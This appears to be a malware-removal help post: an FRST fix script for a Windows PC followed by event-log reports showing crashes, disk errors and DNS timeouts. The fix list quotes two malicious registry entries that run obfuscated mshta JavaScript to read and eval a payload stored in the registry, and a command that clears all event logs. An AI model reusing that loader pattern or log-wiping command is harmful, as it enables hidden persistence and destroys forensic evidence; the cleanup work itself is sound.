Task: {7F33D015-0655-46A8-B3DA-839C16E15F22} - System32\Tasks\{EF120DE6-BF35-43A2-B9B0-F60A443C2B68} => pcalua.exe -a "C:\Program Files (x86)\Xilisoft\YouTube Video Converter\Uninstall.exe"
Task: {815BA402-E344-4BD4-AE42-0CF840DD3A79} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {B4A2EC81-1C16-4D3E-9275-A302BE1F49C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C7F3E5CE-282C-4D59-97CE-2CC1A0287DE7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {CD0C4A4F-7934-4C1C-B5B7-100C05A17EAF} - System32\Tasks\{34CBDC00-3CBA-4835-BC55-E95FC3A0F944} => pcalua.exe -a C:\Users\Dorraine\Downloads\bouncy_snowmen.exe -d C:\Users\Dorraine\Downloads
Task: {CD2C8A99-3A16-49FE-A426-5A21F0049B28} - \Microsoft\Windows\Setup\gwx\rundetector -> No File <==== ATTENTION
Task: {E1DA30AF-E430-47F4-A4A3-0D03A968574D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {EB022CFD-2B91-4BE4-BF5A-BB26BEB9DE8B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F083E0F2-9ED4-4AC1-A705-073D81C43930} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F305E9EB-6B8E-483E-A859-144C5B87F227} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\3befe: "C:\WINDOWS\system32\mshta.exe" "javascript:xo1HK5M="i2z";l7I2=new ActiveXObject("WScript.Shell");kB7uBa3="b4Nsza";J3iVy2=l7I2.RegRead("HKCU\\software\\fnbc\\szon");PI7TM6="I1PHTLV";eval(J3iVy2);gh4Qj0c="DT5h";" <===== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\e30a8741: "C:\WINDOWS\system32\mshta.exe" "javascript:YgjdAp2="tW";F5b=new ActiveXObject("WScript.Shell");yCFFDJ5i="c";a6wXv2=F5b.RegRead("HKCU\\software\\ycqzblx\\isbkuu");XgoRnR5L7="BEfn";eval(a6wXv2);TXVMr6="W2";" <===== ATTENTION
C:\Users\Dorraine\AppData\Local\360fd
C:\Users\Dorraine\AppData\Local\7df78865
CMD: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

 

 

Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:09:33 PM

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 08/12/2016 6:30:47 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 05/12/2016 4:11:37 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 25/11/2016 6:24:29 AM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 20/11/2016 9:34:31 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 14/11/2016 6:10:56 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 12/11/2016 11:30:59 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 12/11/2016 4:26:35 AM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 11/11/2016 7:24:42 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 11/11/2016 7:03:35 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 03/11/2016 11:29:02 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 20/10/2016 10:16:17 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 13/10/2016 7:20:16 AM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 11/01/2017 7:08:31 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 7:08:30 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 7:06:23 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 7:06:22 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 7:04:14 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 7:04:14 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 7:02:06 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 7:02:06 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:59:58 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:59:58 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:57:50 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:57:50 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:55:42 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:55:42 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:53:34 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:53:34 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:51:26 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:51:26 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:49:18 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

Log: 'System' Date/Time: 11/01/2017 6:49:18 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_Compact_Flash&Rev_1.01#058F63626420&1#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.

Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_MS#MS-Pro&Rev_1.03#058F63626420&3#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.

Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_SD#MMC&Rev_1.00#058F63626420&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.

Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_SM#xD_Picture&Rev_1.02#058F63626420&2#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.

Log: 'System' Date/Time: 11/01/2017 7:54:41 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name videos.vehicledata.com timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 07/01/2017 8:26:51 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 04/01/2017 6:04:12 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.

Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.

Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.

Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.

Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.

Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.

Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 153 Source: disk
The IO operation at logical block address 0x2388 for Disk 1 (PDO name: \Device\00000031) was retried.

Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.

Log: 'System' Date/Time: 31/12/2016 6:49:46 PM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name vast.ssp.optimatic.com timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 30/12/2016 8:24:23 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 29/12/2016 8:28:50 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 28/12/2016 5:01:57 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name dpm.demdex.net timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 28/12/2016 1:19:36 AM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_Compact_Flash&Rev_1.01#058F63626420&1#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.

 

 

Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.

Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.

Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.

Context:  Application, SystemIndex Catalog

Details:
    The system cannot find the file specified.  (HRESULT : 0x80070002) (0x80070002)


Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..
 

 

Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.

Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
